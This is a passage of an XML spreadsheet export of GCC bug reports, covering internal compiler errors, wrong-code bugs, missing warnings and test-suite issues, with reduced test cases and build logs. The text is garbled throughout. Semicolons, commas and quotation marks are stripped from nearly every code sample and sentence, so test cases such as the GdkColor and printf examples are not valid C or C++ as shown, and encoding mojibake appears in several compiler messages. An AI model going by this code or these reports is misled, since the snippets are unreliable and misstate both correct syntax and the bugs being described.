g++-cust: cannot specify -o with -c or -S and multiple compilations
Note that g++ is debian package g++ version 2.95.4-17 (mentioned for 
completeness).
g++-cust as shown in the fields is compiled from CVS and installed 
into my home directory.
Though seemingly particularly useless the preprocessor output is as 
follows:
$ g++ -o - -E abc.cpp
# 1 abc.cpp
int main() {
  return 0
}
$ g++-cust -o - -E  abc.cpp
# 1 abc.cpp
# 1 
# 1 
# 1 abc.cpp
int main() {
  return 0
}
Output similar to the last example can be seen from g++-3.2.
(above can be seen 'built-in' and 'command-line' within angle brackets 
which will probably be filtered out by the submission process).</t>
  </si>
  <si>
    <t>riceman+gcc</t>
  </si>
  <si>
    <t>GCC-7145</t>
  </si>
  <si>
    <t>g++ -O with structure initializer &amp; return value optimization generates bad code</t>
  </si>
  <si>
    <t>An inline function subject to return value optimization where the returned argument is initialized
with an initializer-list generates bad code with -O. It seems to only happen when it's an odd
number of halfwords.
Release:
3.1.1 20020617 (prerelease) [FreeBSD]
Environment:
System: FreeBSD tlb.blackwells.net 4.5-RELEASE-p2 FreeBSD 4.5-RELEASE-p2 #3: Sat Mar 9 12:32:15 PST 2002 root@tlb.umbrellaresearch.com:/d1/usr-obj/usr/src/sys/TLB i386
host: i386-portbld-freebsd4.5
build: i386-portbld-freebsd4.5
target: i386-portbld-freebsd4.5
configured with: ./..//gcc-20020617/configure --disable-nls --with-gnu-as --with-gnu-ld --with-gxx-include-dir=/usr/local/lib/gcc-lib/i386-portbld-freebsd4.5/3.1.1/include/g++ --disable-libgcj --disable-shared --prefix=/usr/local i386-portbld-freebsd4.5
How-To-Repeat:
Compile the following C++ code with g++ -O. On my system it prints junk values:
  mkcolor: pixel=-1077938364 r=-2244 g=-16449 b=0
It depends on the structure if I remove the 'blue' member it works. I suspect it has
to do with whether it's a multiple of the word size.
It seems to complete optimize away the initialization as you can see in the assembly output.
-------------------------------------------------------------------------------------------------------
extern C int printf(const char * ...)
struct GdkColor {
  long  pixel
  short red
  short green
  short blue
}
inline GdkColor mkcolor() {
  GdkColor ret={0123}
  return ret
}
int
main()
{
  GdkColor col=mkcolor()
  printf(mkcolor: pixel=%d r=%d g=%d b=%d\n col.pixel col.red col.green col.blue)
}
-----------------------------------------------------------------------------------------------------
main:
.LFB1:
        pushl   %ebp
.LCFI0:
        movl    %esp %ebp
.LCFI1:
        subl    $24 %esp
.LCFI2:
        andl    $-16 %esp
        subl    $12 %esp
        movswl  -16(%ebp)%eax
        pushl   %eax
        movswl  -18(%ebp)%eax
        pushl   %eax
        movswl  -20(%ebp)%eax
        pushl   %eax
        pushl   -24(%ebp)
        pushl   $.LC0
.LCFI3:
        call    printf
        movl    $0 %eax
        leave
        ret
-----------------------------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>tlb</t>
  </si>
  <si>
    <t>GCC-67218</t>
  </si>
  <si>
    <t>Combine incorrectly folds (double) (float) (unsigned)</t>
  </si>
  <si>
    <t>simplify-rtx.c folds (double) (float) (some-int) into
(double) (some-int) if it can prove that the intermediate
(float) doesn't have any effect.  This check is based on
the number of known sign bit copies which inherently assumes
a signed interpretation of (some-int) and is therefore only
valid for FLOAT.  For UNSIGNED_FLOAT we can end up treating a
large unsigned value as fitting in a float.
The following test case fails at -O and above on aarch64-linux-gnu
because of this:
extern void abort (void) __attribute__ ((noreturn))
double __attribute__ ((noinline noclone))
foo (unsigned int x)
{
  return (double) (float) (x | 0xffff0000)
}
int
main ()
{
  if (foo (1) != 0x1.fffep31)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-36597</t>
  </si>
  <si>
    <t>OpenMP 3:  _OPENMP should be 200805 instead of 200505</t>
  </si>
  <si>
    <t>http://www.openmp.org/mp-documents/spec30.pdf Version 3.0 May 2008
2.2 Conditional Compilation
In implementations that support a preprocessor the _OPENMP macro name is defined to have the decimal value yyyymm where yyyy and mm are the year and month designations of the version of the OpenMP API that the implementation supports.
Currently GCC 4.4 returns 200505 (as do GCC 4.2 and 4.3):
#define _OPENMP 200505
Expected:   #define _OPENMP 200805  (-8- not -5-)</t>
  </si>
  <si>
    <t>GCC-7121</t>
  </si>
  <si>
    <t>other: .bb .da .bbg files put in wrong directory</t>
  </si>
  <si>
    <t xml:space="preserve">        in
          gcc-3.0 -fprofile-arcs -ftest-coverage SomeDir/somefile.c
        gcc puts somefile's .bb .bbg and .da files in the gcc's current
        working directory not in SomeDir. This contradicts the
        gcc-3.0 docs:
          These additional files are placed in the directory
           where the source code is located.
          [from http://gcc.gnu.org/onlinedocs/gcc-3.0/gcc_8.html]
Release:
3.0.4 (Debian testing/unstable)
Environment:
System: Linux pebbles 2.2.20cs.std.1 #1 Wed Dec 5 23:51:44 EST 2001 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
        gcc-3.0 -fprofile-arcs -ftest-coverage SomeDir/somefile.c</t>
  </si>
  <si>
    <t>cdharris</t>
  </si>
  <si>
    <t>GCC-9887</t>
  </si>
  <si>
    <t>Syntax error on explicit member function template argument in function template body</t>
  </si>
  <si>
    <t>The type of a member funtion template can't be specified explicitly when called from the context of a funtion template where the class of the member function is a template argument. G++ gives a syntax error.
Preprocessed source:
# 1 t.cc
# 1 
# 1 
# 1 t.cc
class A {
public:
  template
  void f() {
  }
}
template
void g(T x) {
  x.f() // syntax error
}
void h() {
  A a
  a.f() // ok
  g(a)
}
Command line: g++ -v -save-temps -c -Wall t.cc
Output:
Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.3/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77protopascalobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.2.3 20030210 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/3.2.3/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ t.cc -Wall t.ii
GNU CPP version 3.2.3 20030210 (Debian prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2
 /usr/include/c++/3.2/i386-linux
 /usr/include/c++/3.2/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.2.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.2.3/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.cc -Wall -version -o t.s
GNU CPP version 3.2.3 20030210 (Debian prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2.3 20030210 (Debian prerelease) (i386-linux)
        compiled by GNU C version 3.2.3 20030210 (Debian prerelease).
t.cc: In function `void g(T)':
t.cc:10: syntax error before `&gt;' token
Release:
GNU C++ version 3.2.3 20030210
Environment:
Debian GNU/Linux unstable on Intel Celeron machine with 256MB RAM.
How-To-Repeat:
See description.</t>
  </si>
  <si>
    <t>isak</t>
  </si>
  <si>
    <t>GCC-82902</t>
  </si>
  <si>
    <t>[7 Regression] ICE verify_ssa failed during GIMPLE pass: phiprop</t>
  </si>
  <si>
    <t>Created attachment 42565
Reduced test case compile with -O1 -ftree-vrp (or -O2)
Compiling a particular file (reduce case attached) with -O1 -ftree-vrp (or -O2) fails with:
test1.c: In function â€˜aâ€™:
test1.c:49:5: error: definition in block 8 does not dominate use in block 5
 int a( LT elt CEV_T *CEV )
     ^
for SSA_NAME: _5 in statement:
# .MEM_22 = VDEF 
*_5 = MEM[(struct EV_T *)_16]
during GIMPLE pass: phiprop
test1.c:49:5: internal compiler error: verify_ssa failed
0xe20803 verify_ssa(bool bool)
        ../../gcc-trunk/gcc/tree-ssa.c:1188
0xb6dcbd execute_function_todo
        ../../gcc-trunk/gcc/passes.c:2001
0xb6ea2e execute_todo
        ../../gcc-trunk/gcc/passes.c:2048
Works with -O2 -no-tree-vrp.
The ICE is from a trunk build gcc version 8.0.0 20171108 (x86_64-pc-linux-gnu)
Gcc 7.0 to 7.2 produces invalid code which will SEGV at runtime (same result on many platforms).
Gcc 6.3 and earlier produced working code.
To reproduce:
  gcc -O1 -ftree-vrp test1.c</t>
  </si>
  <si>
    <t>jvb</t>
  </si>
  <si>
    <t>GCC-5878</t>
  </si>
  <si>
    <t>gcc 3.1 breaks on C code generated by the Mercury compiler</t>
  </si>
  <si>
    <t>gcc 3.1 gets an internal error when compiling the attached
file with optimization enabled.
This is a regression from gcc 2.95.3.
The output is:
bash$ gcc -O mercury-gcc3.1.c
mercury-gcc3.1.c: In function `f':
mercury-gcc3.1.c:22: Internal compiler error in verify_local_live_at_start at flow.c:606
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.1 20020304 (prerelease)
Environment:
Reading specs from /tmp/fjh/install/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: configure --prefix=/tmp/fjh/install
Thread model: single
gcc version 3.1 20020304 (prerelease)
How-To-Repeat:
Compile the attached file with `gcc -c -O'
e.g. `gcc -c -O bug.c'.
void *dummy (void *)
register void *reg __asm__ (ebx)
void
f (void)
{
  goto *dummy (
  for ()
    {
    foo:
      (reg) = (void *) 1
      if (!reg)
        goto baz
      reg = (
    }
bar:
baz:
  reg = 0
}</t>
  </si>
  <si>
    <t>fjh</t>
  </si>
  <si>
    <t>GCC-80906</t>
  </si>
  <si>
    <t>[7 Regression] ICE in copy_loop_close_phi_args at graphite-isl-ast-to-gimple.c:2094</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20170521 snapshot as well as gcc 7.1 ICEs when compiling the following snippet w/ -O2 (-O3 -Ofast) -floop-nest-optimize:
int qc
int
ec (int lh[][2])
{
  const int jv = 3
  int zf hp c5 = 0 m3 = 1
  for (zf = 0 zf &lt; jv ++zf)
    for (hp = 0 hp &lt; jv ++hp)
      {
        short int bm = 0
        for (qc = 0 qc &lt; jv ++qc)
          --bm
        if (bm != 0)
          --c5
        lh[0][0] = 0
        m3 *= jv
      }
  return c5 + m3
}
% x86_64-unknown-linux-gnu-gcc-8.0.0-alpha20170521 -O2 -floop-nest-optimize -c bnjajc7i.c
bnjajc7i.c: In function 'ec':
bnjajc7i.c:4:1: internal compiler error: in copy_loop_close_phi_args at graphite-isl-ast-to-gimple.c:2094
 ec (int lh[][2])
 ^~
Earlier I posted another testcase which I believe reproduces the same issue in PR70390 comment 10. So the current PR may well be a duplicate of PR70390 though the testcase filed above compiles well by gcc 6.3.</t>
  </si>
  <si>
    <t>GCC-39983</t>
  </si>
  <si>
    <t>ICE: type mismatch in address expression</t>
  </si>
  <si>
    <t>gcc-trunk rev.147009 with command-line 
gcc -O -c tst7.c
fail to compile
typedef struct {
    int *p
} *A
extern const int a[1]
extern const int b[1]
void foo()
{
    A x
    A y
    static const int * const c[] = { b }
    x-&gt;p = (int*)c[0]
    y-&gt;p = (int*)a
}
with message:
tst7.c: In function â€˜fooâ€™:
tst7.c:16: error: type mismatch in address expression
int *
const int[1] *
# .MEM_5 = VDEF 
x_2(D)-&gt;p = 
tst7.c:16: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[root@localhost gcc_err]# gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-languages=cc++ --enable-version-specific-runtime-libs : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-languages=cc++ --enable-version-specific-runtime-libs : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion : (reconfigured) ../gcc_current/configure --prefix=/usr/local/gcc_current --enable-bootstrap --enable-shared --enable-checking=yes --with-system-zlib --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-languages=cc++ --no-create --no-recursion
Thread model: posix
gcc version 4.5.0 20090430 (experimental) [trunk revision 147009] (GCC)</t>
  </si>
  <si>
    <t>GCC-29048</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2/4.3 Regression] `x' is private error duplicated when scope specified</t>
  </si>
  <si>
    <t>Given file `ptest.cpp':
class A {int i}
class B : public A {B() {A::i=0}}
I get (with quotes replaced with ASCII and some bijective directory simplification)
$ g++ -v ptest.cpp
Reading specs from /opt/local/gcc402/bin/../lib/gcc/i686-pc-linux-gnu/4.0.2/specs
Target: i686-pc-linux-gnu
Configured with: /opt/build/gcc-4.0.2/configure --with-included-gettext --enable-libgcj --enable-__cxa_atexit --with-gmp=/usr/packages/libgmp41 --with-mpfr=/usr/packages/libmpfr22 --with-gmp-ldflags=-Wl-rpath/usr/packages/libgmp41/lib --with-mpfr-ldflags=-Wl-rpath/usr/packages/libmpfr22/lib --enable-languages=adacc++f95java --datadir=/usr/packages/gcc402/share --with-gnu-as --with-as=/usr/packages/gcc402/i686-pc-linux-gnu/bin/as --with-gnu-ld --with-ld=/usr/packages/gcc402/i686-pc-linux-gnu/bin/ld --with-local-prefix=/usr/packages/gcc402 --with-gxx-include-dir=/usr/packages/gcc402/include/c++ --prefix=/usr/packages/gcc402
Thread model: posix
gcc version 4.0.2 (TWW)
 /opt/local/gcc402/bin/../libexec/gcc/i686-pc-linux-gnu/4.0.2/cc1plus -quiet -v -iprefix /opt/local/gcc402/bin/../lib/gcc/i686-pc-linux-gnu/4.0.2/ -D_GNU_SOURCE ptest.cpp -quiet -dumpbase ptest.cpp -mtune=pentiumpro -auxbase ptest -version -o /tmp/cccHYSJN.s
ignoring nonexistent directory /opt/local/gcc402/bin/../lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../i686-pc-linux-gnu/include
ignoring duplicate directory /usr/packages/gcc402/lib/gcc/i686-pc-linux-gnu/4.0.2/include
ignoring nonexistent directory /usr/packages/gcc402/lib/gcc/i686-pc-linux-gnu/4.0.2/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/local/gcc402/bin/../lib/gcc/i686-pc-linux-gnu/4.0.2/include
 /usr/packages/gcc402/include/c++
 /usr/packages/gcc402/include/c++/i686-pc-linux-gnu
 /usr/packages/gcc402/include/c++/backward
 /usr/packages/gcc402/include
 /usr/include
End of search list.
GNU C++ version 4.0.2 (TWW) (i686-pc-linux-gnu)
	compiled by GNU C version 4.0.2 (TWW).
GGC heuristics: --param ggc-min-expand=98 --param ggc-min-heapsize=128115
ptest.cpp: In constructor `B::B()':
ptest.cpp:1: error: `int A::i' is private
ptest.cpp:2: error: within this context
ptest.cpp:1: error: `int A::i' is private
ptest.cpp:2: error: within this context
The error is quite accurate but it's given twice!  The error is only printed once if A:: is omitted from the file.</t>
  </si>
  <si>
    <t>herring</t>
  </si>
  <si>
    <t>GCC-41131</t>
  </si>
  <si>
    <t>[4.3 Regression] non-lvalue in unary `&amp;' wrongly accepted</t>
  </si>
  <si>
    <t>According to the iso 14882:1998 5.2.5 Class member access the following code:
class X {
public:
        enum enumX { a=100 }
}
int main(void)
{
        X x
        (void)     // should not compile
        return  1
}
should not compile but with the following version of g++:
g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-threads=posix
--prefix=/prj/dsp/qdsp6_aus/users/slarin/x86_gcc_4.4/bin
--enable-languages=cc++ --disable-checking
Thread model: posix
gcc version 4.4.0 (GCC)
... it does. Also failing in 4.3.2. In 3.3.3 and 3.4.6 for example it correctly reports the following:
g++ reduced.c
reduced.c: In function `int main()':
reduced.c:11: error: non-lvalue in unary `&amp;'
Thank you.</t>
  </si>
  <si>
    <t>sergei_lus</t>
  </si>
  <si>
    <t>GCC-12594</t>
  </si>
  <si>
    <t>DRs 60 [TC] and 63 [TC] not implemented</t>
  </si>
  <si>
    <t>This patch somehow fell through the cracks:
http://gcc.gnu.org/ml/libstdc++/2003-09/msg00102.html
Note that this doesn't handle all of DR 60.</t>
  </si>
  <si>
    <t>GCC-83776</t>
  </si>
  <si>
    <t>[6/7/8 Regression] missing -Warray-bounds indexing past the end of a string literal</t>
  </si>
  <si>
    <t>MEM_REF gets in the way of diagnosing -Warray-bounds in other cases where it's quite difficult to deal with but it should be straightforward to diagnose the cases where the operand is a string literal like in the test case below.
$ cat d.c &amp;&amp; gcc -O2 -S -Wall -fdump-tree-optimized=/dev/stdout d.c
#define S 0123456789
int f (void)
{
  return S[16]   // -Warray-bounds (good)
}
int g (void)
{
  const char *p = S + 16   // missing -Warray-bounds
  return *p                // either here or above 
}
int h (void)
{
  const char *p = S
  return p[16]   // missing -Warray-bounds
}
d.c: In function â€˜fâ€™:
d.c:5:11: warning: array subscript 16 is above array bounds of â€˜char[11]â€™ [-Warray-bounds]
   return S[16]   // -Warray-bounds (good)
           ^
 Function f (f funcdef_no=0 decl_uid=1950 cgraph_uid=0 symbol_order=0)
f ()
{
  char _1
  int _2
   [local count: 1073741825]:
  _1 = 0123456789[16]
  _2 = (int) _1
  return _2
}
 Function g (g funcdef_no=1 decl_uid=1953 cgraph_uid=1 symbol_order=1)
g ()
{
  char _1
  int _3
   [local count: 1073741825]:
  _1 = MEM[(const char *)0123456789 + 16B]
  _3 = (int) _1
  return _3
}
 Function h (h funcdef_no=4 decl_uid=1957 cgraph_uid=2 symbol_order=2)
h ()
{
  char _3
  int _4
   [local count: 1073741825]:
  _3 = MEM[(const char *)0123456789 + 16B]
  _4 = (int) _3
  return _4
}</t>
  </si>
  <si>
    <t>GCC-27270</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in process_init_constructor_array at cp/typeck2.c:788</t>
  </si>
  <si>
    <t>with a recent gcc snapshot on i386:
  c++ (GCC) 4.2.0 20060325 (experimental)
the following tst program program:
template                                                                                                                                      
struct Array {                                                                                                                                                
  Entry *array[32]                                                                                                                                           
  Array () :                                                                                                                                                  
    array ( (Entry*[1]) { 0 0 } )                                                                                                                            
  {}                                                                                                                                                          
}                                                                                                                                                            
Array a
compiled with:
  c++ -Wall arrayinit.cc
produces:
arrayinit.cc: In constructor 'Array::Array() [with Entry = void*]':
arrayinit.cc:8:   instantiated from here
arrayinit.cc:5: internal compiler error: in process_init_constructor_array at cp/typeck2.c:788
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>timj</t>
  </si>
  <si>
    <t>GCC-68084</t>
  </si>
  <si>
    <t>Inverted conditions generated for x86 inline assembly flag output constraints</t>
  </si>
  <si>
    <t>I have been trying out the new flag output constraints feature in inline assembly (=@ccCC) and have found GCC sometimes incorrectly generates inverted conditions in assembler code.
The minimal test case is as follows:
_Bool dec_ref(unsigned *p)
{
  _Bool r
  asm (cmp %2 %1 : =@ccae(r) : m(*p) ri(2))
  if (r)
    return __atomic_sub_fetch(p 1 __ATOMIC_RELEASE) == 0
  return 1
}
GCC (6.0.0 20151024) generates the following assembler code:
dec_ref:
        cmp $2 (%rdi)
        movl    $1 %eax
        jc      .L7
        rep ret
        .p2align 410
        .p2align 3
.L7:
        lock subl       $1 (%rdi)
        sete    %al
        ret
where jc is incorrect. It should be jnc.
Interestingly GCC generates the expected code if =@ccae is written as =@ccnb (ae and nb are synonymous).</t>
  </si>
  <si>
    <t>richardpku</t>
  </si>
  <si>
    <t>CLASSPATH-22648</t>
  </si>
  <si>
    <t>File link on savannah doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve">Fixed in CVS.  Thanks for reporting this.
</t>
  </si>
  <si>
    <t>GCC-80972</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE with alignas and __attribute__((packed))</t>
  </si>
  <si>
    <t>The testcase g++.dg/torture/pr80334.C triggers an ICE when compiled
with -std=c++1z since GCC 7.1.0. Here's an even shorter version:
======================================================
struct A { alignas(2) char c }
struct B { A a } __attribute__((packed))
A a = B().a
======================================================
bug.cc:4:11: internal compiler error: in build_over_call at cp/call.c:7989
 A a = B().a
           ^
0x5fd0b5 build_over_call
	../../gcc/gcc/cp/call.c:7986
0x5fdbbe build_new_method_call_1
	../../gcc/gcc/cp/call.c:8823
0x5fdbbe build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc/gcc/cp/call.c:8892
0x5ff039 build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
	../../gcc/gcc/cp/call.c:8421
0x671255 ocp_convert(tree_node* tree_node* int int int)
	../../gcc/gcc/cp/cvt.c:893
0x6eb2b5 expand_default_init
	../../gcc/gcc/cp/init.c:1788
0x6eb2b5 expand_aggr_init_1
	../../gcc/gcc/cp/init.c:1967
0x6eba59 build_aggr_init(tree_node* tree_node* int int)
	../../gcc/gcc/cp/init.c:1705
0x687faf build_aggr_init_full_exprs
	../../gcc/gcc/cp/decl.c:6127
0x687faf check_initializer
	../../gcc/gcc/cp/decl.c:6275
0x6a91dc cp_finish_decl(tree_node* tree_node* bool tree_node* int)
	../../gcc/gcc/cp/decl.c:6994
0x74f3e3 cp_parser_init_declarator
	../../gcc/gcc/cp/parser.c:19389
0x76e92c cp_parser_simple_declaration
	../../gcc/gcc/cp/parser.c:12800
0x76f6c5 cp_parser_block_declaration
	../../gcc/gcc/cp/parser.c:12625
0x741b74 cp_parser_declaration
	../../gcc/gcc/cp/parser.c:12523
0x77753b cp_parser_declaration_seq_opt
	../../gcc/gcc/cp/parser.c:12399
0x77781a cp_parser_translation_unit
	../../gcc/gcc/cp/parser.c:4364
0x77781a c_parse_file()
	../../gcc/gcc/cp/parser.c:38475
0x8b9066 c_common_parse_file()
	../../gcc/gcc/c-family/c-opts.c:1104
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-25658</t>
  </si>
  <si>
    <t>testsuite failure: 23_containers/deque/cons/assign/1.cc</t>
  </si>
  <si>
    <t>This testsuite fails due to a timeout on this 3GHz P4 machine with 1GB PC3200 DDR.
The actual runtime when run manually (it exits successfully)
is reported by time as:
mmix 1.exe  397.73s user 0.07s system 100% cpu 6:37.71 total
Admittedly the mmix simulator could be faster but I think
the test doesn't have to be that long-running.
Can we divide all loop counters by say 100?
Or run the test only as native?</t>
  </si>
  <si>
    <t>GCC-48042</t>
  </si>
  <si>
    <t>lto segfaults while building Qt 4.7.2 with -g -flto -fwhole-program</t>
  </si>
  <si>
    <t>Trying to build Qt 4.7.2 with -g -flto for the library and -g -flto -fwhole-program for the tools crashes gcc.
[bero@matterhorn uic3]$ g++ -Wl-rpath-link/usr/src/ark/BUILD/qt/lib -m64 -O2 -g -Wl-rpath/usr/lib64/qt4-embedded/lib -Wl-rpath/usr/lib64/qt4-embedded/lib -flto -fwhole-program -o ../../../bin/uic3 .obj/release-static-emb-x86_64/customwidgetsinfo.o .obj/release-static-emb-x86_64/databaseinfo.o .obj/release-static-emb-x86_64/driver.o .obj/release-static-emb-x86_64/treewalker.o .obj/release-static-emb-x86_64/ui4.o .obj/release-static-emb-x86_64/validator.o .obj/release-static-emb-x86_64/cppextractimages.o .obj/release-static-emb-x86_64/cppwritedeclaration.o .obj/release-static-emb-x86_64/cppwriteicondata.o .obj/release-static-emb-x86_64/cppwriteicondeclaration.o .obj/release-static-emb-x86_64/cppwriteiconinitialization.o .obj/release-static-emb-x86_64/cppwriteincludes.o .obj/release-static-emb-x86_64/cppwriteinitialization.o .obj/release-static-emb-x86_64/main.o .obj/release-static-emb-x86_64/ui3reader.o .obj/release-static-emb-x86_64/parser.o .obj/release-static-emb-x86_64/domtool.o .obj/release-static-emb-x86_64/object.o .obj/release-static-emb-x86_64/subclassing.o .obj/release-static-emb-x86_64/form.o .obj/release-static-emb-x86_64/converter.o .obj/release-static-emb-x86_64/widgetinfo.o .obj/release-static-emb-x86_64/embed.o .obj/release-static-emb-x86_64/qt3to4.o .obj/release-static-emb-x86_64/deps.o .obj/release-static-emb-x86_64/uic.o    -L/usr/src/ark/BUILD/qt/lib -lQt3Support -L/usr/src/ark/BUILD/qt/lib -lQtSql -lsqlite3 -lQtXml -lQtGui -ljpeg -lmng -ltiff -lpng -lfreetype -lQtNetwork -lssl -lcrypto -lQtCore -lz -lm -ldl -pthread -lgthread-2.0 -lrt -lglib-2.0 -lpthread
lto1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: g++ returned 1 exit status
/usr/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
This is with yesterday's gcc svn (rev. 170774).
It works (and actually produces a working binary) if I omit -g. Replacing -g with -ggdb or -gdrawf-4 doesn't change anything.</t>
  </si>
  <si>
    <t>GCC-6582</t>
  </si>
  <si>
    <t>memory leaks in iostream  and locale</t>
  </si>
  <si>
    <t>Some static objects created by libstdc++ namely std::cin
std::cout std::cerr std::clog and the classic locale are
not destroyed at the program termination. Since they contain data members such as strings callback lists etc. which hold dynamically allocated storage fragments they look perfectly like memory leaks.
These leaks do not constitute a problem as such there are
though two reasons for eliminating them:
1. of systematical nature: why bother to delete filebufs
belonging to the streams but let other components out
2. of practical nature: when hunting for real memory leaks
in the application using some automated means be that purify or a self-made drop-in for the STL allocator these additional leaks really disturb: The allocation
requests do not come at predictable moments so that it's
rather difficult to filter them out.
Release:
3.0.4
Environment:
n/a</t>
  </si>
  <si>
    <t>GCC-6453</t>
  </si>
  <si>
    <t>g++ regression in 3.1</t>
  </si>
  <si>
    <t>Given the following nonsense code...
void *foo()
{
  char x[100]
  x++
  return (void *) x
}
Red Hat's g++ 2.96 reports:
$ g++ -c c.cc
c.cc: In function `void *foo ()':
c.cc:4: non-lvalue in increment
c.cc:3: warning: address of local variable `x' returned
Unfortunately I don't have an older FSF release handy to test on (like
2.95 or 3.0) so I don't know what they do.  However the current 3.1
branch says:
$ g++ -c c.cc
non-lvalue
in
increment
address
of
local
variable
`
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.1 20020424 (prerelease)
Environment:
System: Linux louie 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /louie/green/3.1/gcc/configure --prefix=/louie/green/3.1/i --enable-threads --enable-languages=cc++java : (reconfigured)  : (reconfigured)
How-To-Repeat:
Compile the following with g++:
void *foo()
{
  char x[100]
  x++
  return (void *) x
}</t>
  </si>
  <si>
    <t>GCC-1726</t>
  </si>
  <si>
    <t>ICE in function.c</t>
  </si>
  <si>
    <t>r2d2:~/khepera/optann$ make gsim
g++ -c environ.cc -O3 -g2 -L./lib -Wall -I/pub/sun/include  -L./trivialgfx/lib -I./trivialgfx/include `gtk-config --cflags` -DGUI -DTARGET_X -o environg.o
environ.cc: In method `void Environ::loadWorld(const char *)':
environ.cc:361: Internal compiler error in `find_function_data' at function.c:542
Please submit a full bug report.
See  for instructions.
make: *** [environg.o] Error 1
Release:
gcc version 2.95.2 20000220 (Debian GNU/Linux)
Environment:
Debian woody
BASH=/bin/bash
BASH_VERSINFO=([0]=2 [1]=04 [2]=0 [3]=1 [4]=release [5]=i386-pc-linux-gnu)
BASH_VERSION='2.04.0(1)-release'
COLUMNS=125
DIRSTACK=()
DISPLAY=:0.0
EBIN=/usr/bin
ECACHEDIR=/root/.enlightenment
ECONFDIR=/root/.enlightenment
